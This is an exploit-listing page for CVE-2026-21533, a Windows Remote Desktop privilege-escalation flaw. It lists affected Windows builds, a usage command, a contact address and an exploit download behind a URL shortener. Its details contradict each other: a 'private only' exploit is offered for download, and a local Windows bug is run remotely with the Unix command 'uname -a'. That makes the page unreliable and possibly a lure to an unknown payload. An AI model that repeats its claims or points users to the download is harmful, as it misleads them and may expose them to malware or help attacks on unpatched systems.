## https://sploitus.com/exploit?id=FCAAB2EC-5D0F-55C5-B649-E477AF1C104C
# Security Vulnerability (CVE-2026-21533)
## Overview
A HIGH vulnerability, classified as CVE-2026-21533, has been identified, categorized under CWE-269, (CVSS 7.8). Improper privilege management in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.
## Details
- **CVE ID**: [CVE-2026-21533](https://nvd.nist.gov/vuln/detail/CVE-2026-21533)
- **Discovered**: 2026-02-10
- **Published**: 2026-02-10
- **Impact**: Confidentiality, Integrity, Availability
- **Exploit Availability**: Not public, only private.
## Vulnerability Description
Improper privilege management in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.
## Affected Versions
**Microsoft Windows 10 1607:**
- before 10.0.14393.8868
**Microsoft Windows 10 1809:**
- before 10.0.17763.8389
**Microsoft Windows 10 21H2:**
- before 10.0.19044.6937
**Microsoft Windows 10 22H2:**
- before 10.0.19045.6937
**Microsoft Windows 11 23H2:**
- before 10.0.22631.6649
**Microsoft Windows 11 24H2:**
- before 10.0.26100.7781
**Microsoft Windows 11 25H2:**
- before 10.0.26200.7781
**Microsoft Windows Server 2012:**
- -
- r2
**Microsoft Windows Server 2016:**
- before 10.0.14393.8868
**Microsoft Windows Server 2019:**
- before 10.0.17763.8389
**Microsoft Windows Server 2022:**
- before 10.0.20348.4711
**Microsoft Windows Server 2022 23H2:**
- before 10.0.25398.2149
**Microsoft Windows Server 2025:**
- before 10.0.26100.32313
## Running
To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Contact
For inquiries, please contact **security@exploit.in**
## Exploit:
### [Download here](https://tinyurl.com/2czlmkdp)